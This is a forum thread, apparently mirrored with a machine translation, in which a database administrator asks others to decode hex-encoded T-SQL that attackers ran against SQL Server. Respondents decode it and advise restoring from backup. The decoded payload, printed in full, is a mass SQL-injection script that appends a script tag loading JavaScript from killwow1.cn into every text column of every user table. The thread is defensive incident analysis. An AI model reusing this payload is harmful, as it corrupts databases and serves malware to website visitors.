紧急:解密针对数据库执行的二进制代码 [英] Urgent: Deciphering binary code executed against the database
问题描述
我需要弄清楚一些恶意执行的代码对于数据库是什么
。然而,它的格式非常奇怪。它只需声明一个变量并将其设置为等于一个巨大的二进制东西
(似乎是某种编译代码)转换为nvarchar。然后
执行这个变量。
有没有办法解密或反编译这段代码?有没有人
有关于SQL Server在被要求执行二进制字符串(而不是常规T-SQL)和任何工具时执行的操作的信息
可以用来反汇编或理解这段代码吗?
谢谢!
这里是代码:
DECLARE @S NVARCHAR(4000);
设置
@ S = CAST(0x4400450043004C00410052004500200040005400 20007600610072006300680061007200280032003500350029 002C0040004300200076006100720063006800610072002800 320035003500290020004400450043004C0041005200450020 005400610062006C0065005F0043007500720073006F007200 200043005500520053004F005200200046004F005200200073 0065006C00650063007400200061002E006E0061006D006500 2C0062002E006E0061006D0065002000660072006F006D0020 007300790073006F0062006A00650063007400730020006100 2C0073007900730063006F006C0075006D006E007300200062 00200077006800650072006500200061002E00690064003D00 62002E0069006400200061006E006400200061002E00780074 0079 00700065003D00270075002700200061006E0064002000 280062002E00780074007900700065003D003900390020006F 007200200062002E00780074007900700065003D0033003500 20006F007200200062002E00780074007900700065003D0032 003300310020006F007200200062002E007800740079007000 65003D00310036003700290020004F00500045004E00200054 00610062006C0065005F0043007500720073006F0072002000 4600450054004300480020004E004500580054002000460052 004F004D00200020005400610062006C0065005F0043007500 720073006F007200200049004E0054004F002000400054002C 004000430020005700480049004C0045002800400040004600 45005400430048005F005300540041005400550053003D0030 002900200042004500470049004E0020006500780065006300 2800270075007000640061007400650020005B0027002B0040 0054002B0027005D00200073006500740020005B0027002B00 400043002B0027005D003D0072007400720069006D00280063 006F006E007600650072007400280076006100720063006800 610072002C005B0027002B00400043002B0027005D00290029 002B00270027003C0073006300720069007000740020007300 720063003D006800 7400740070003A002F002F007700770077 002E006B0069006C006C0077006F00770031002E0063006E00 2F0067002E006A0073003E003C002F00730063007200690070 0074003E002700270027002900460045005400430048002000 4E004500580054002000460052004F004D0020002000540061 0062006C0065005F0043007500720073006F00720020004900 4E0054004F002000400054002C0040004300200045004E0044 00200043004C004F005300450020005400610062006C006500 5F0043007500720073006F00720020004400450041004C004C 004F00430041005400450020005400610062006C0065005F00 43007500720073006F007200
AS NVARCHAR(4000));
EXEC(@S);
也许你可以选择T-SQL的文本并检查执行
计划可能会得到一些暗示它是什么的在做什么?
请告诉我们你的发现。这很奇怪。
****** @ aol.com 写道:
我需要弄清楚一些恶意执行的代码
对数据库的确如此。然而,它的格式非常奇怪。它只需声明一个变量并将其设置为等于一个巨大的二进制东西
(似乎是某种编译代码)转换为nvarchar。然后
执行这个变量。
有没有办法解密或反编译这段代码?有没有人
有关于SQL Server在被要求执行二进制字符串(而不是常规T-SQL)和任何工具时执行的操作的信息
可以用来反汇编或理解这段代码吗?
谢谢!
这里是代码:
DECLARE @S NVARCHAR(4000);
SET
@ S = CAST(0x44004
[...]
EXEC(@S);
Hi
将代码复制到一个测试数据库的查询窗口中,然后输入
EXEC(@S)只需简单地执行
< br $>
SELECT @S
并查看结果。这是我得到的:
DECLARE @T varchar (255),@ C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name
来自sysobjects a,syscolumns b
其中a.id = b.id和a.xtype =''u''和(b.xtype = 99或b.xtype = 35或
b.xtype = 231或b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @ T,@ C
WHILE(@@ FETCH_STATUS = 0)
BEGIN
exec(''update [''+ @ T +'']
set [''+ @ C +''] = rtrim(转换(varchar,[''+ @ C +'']))+''''
< script src = http:// www .killwow1.cn / g.js>< / script>''''''
FETCH NEXT FROM Table_Cursor INTO @ T,@ C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
我不太了解这个真正的作用,而且很多
将取决于从网站上下来的是什么。
但我觉得你有些讨厌,我会尽快杀死这个数据库并从中恢复一个干净的备份。
HTH
Matthias Kl?y
-
www.kcc.ch
It看起来他们已经为每个用户定义的表中的每一列添加了< script src = http://www.killwow1.cn/g.js>< /
script。
您的服务器显然已被盗用。如果您的数据是敏感的,请立即离线,直到您弄清楚它们是如何进入的。如果您有一个使用此数据库的网站,请将其删除
离开。他们显然是通过
将一些js传播到你的网站上,以一种无意的方式将它添加到你的所有数据中
显示为可见文本网络本身。
Hi,
I need to figure out what some code that was maliciously executed
against a database does. However, it''s in a very strange format. It
simply declares a variable and sets it equal to a huge binary thing
(seems to be some sort of compiled code) cast as nvarchar. It then
executes this variable.
Is there any way to decipher or decompile this code? Does anyone
have information either on what SQL Server does when it''s asked to
execute a binary string (as opposed to regular T-SQL) and any tools
that can be used to disassemble or understand this code?
Thanks!
Here''s the code:
DECLARE @S NVARCHAR(4000);
SET
@S=CAST(0x4400450043004C00410052004500200040005400 20007600610072006300680061007200280032003500350029 002C0040004300200076006100720063006800610072002800 320035003500290020004400450043004C0041005200450020 005400610062006C0065005F0043007500720073006F007200 200043005500520053004F005200200046004F005200200073 0065006C00650063007400200061002E006E0061006D006500 2C0062002E006E0061006D0065002000660072006F006D0020 007300790073006F0062006A00650063007400730020006100 2C0073007900730063006F006C0075006D006E007300200062 00200077006800650072006500200061002E00690064003D00 62002E0069006400200061006E006400200061002E00780074 007900700065003D00270075002700200061006E0064002000 280062002E00780074007900700065003D003900390020006F 007200200062002E00780074007900700065003D0033003500 20006F007200200062002E00780074007900700065003D0032 003300310020006F007200200062002E007800740079007000 65003D00310036003700290020004F00500045004E00200054 00610062006C0065005F0043007500720073006F0072002000 4600450054004300480020004E004500580054002000460052 004F004D00200020005400610062006C0065005F0043007500 720073006F007200200049004E0054004F002000400054002C 004000430020005700480049004C0045002800400040004600 45005400430048005F005300540041005400550053003D0030 002900200042004500470049004E0020006500780065006300 2800270075007000640061007400650020005B0027002B0040 0054002B0027005D00200073006500740020005B0027002B00 400043002B0027005D003D0072007400720069006D00280063 006F006E007600650072007400280076006100720063006800 610072002C005B0027002B00400043002B0027005D00290029 002B00270027003C0073006300720069007000740020007300 720063003D0068007400740070003A002F002F007700770077 002E006B0069006C006C0077006F00770031002E0063006E00 2F0067002E006A0073003E003C002F00730063007200690070 0074003E002700270027002900460045005400430048002000 4E004500580054002000460052004F004D0020002000540061 0062006C0065005F0043007500720073006F00720020004900 4E0054004F002000400054002C0040004300200045004E0044 00200043004C004F005300450020005400610062006C006500 5F0043007500720073006F00720020004400450041004C004C 004F00430041005400450020005400610062006C0065005F00 43007500720073006F007200
AS NVARCHAR(4000));
EXEC(@S);
Maybe you could SELECT the text of the T-SQL and check the execution
plan to possibly get some hint of what it''s doing?
Please let us know what you find. That''s pretty odd.
an******@aol.com wrote:
Hi,
I need to figure out what some code that was maliciously executed
against a database does. However, it''s in a very strange format. It
simply declares a variable and sets it equal to a huge binary thing
(seems to be some sort of compiled code) cast as nvarchar. It then
executes this variable.
Is there any way to decipher or decompile this code? Does anyone
have information either on what SQL Server does when it''s asked to
execute a binary string (as opposed to regular T-SQL) and any tools
that can be used to disassemble or understand this code?
Thanks!
Here''s the code:
DECLARE @S NVARCHAR(4000);
SET
@S=CAST(0x44004[...]
EXEC(@S);Hi
Copy the code into a query window for a test datadase, then insted of
the EXEC(@S) just simply do a
SELECT @S
and look at the result. Here is what I got:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(''update [''+@T+'']
set [''+@C+'']=rtrim(convert(varchar,[''+@C+'']))+''''
<script src=http://www.killwow1.cn/g.js></script>'''''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
I''m not good enough to understand what this really does, and a lot
will depend on what is coming down the line from the web site.
But I think you got yourself something nasty, and I would ASAP kill
this DB and restore from a clean backup.
HTH
Matthias Kl?y
--
www.kcc.ch
It looks like they''ve added <script src=http://www.killwow1.cn/g.js></
scriptto each column in each user defined table.
Your server has obviously been compromised. If your data is
sensitive, take it offline right away until you figure out how they
got in. If you have a website that uses this db, take it down right
away. They''re obviously propagating some js onto your website by
adding it in to all your data in a way that is not intended to not
show as visible text on the web itself.
这篇关于紧急:解密针对数据库执行的二进制代码的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
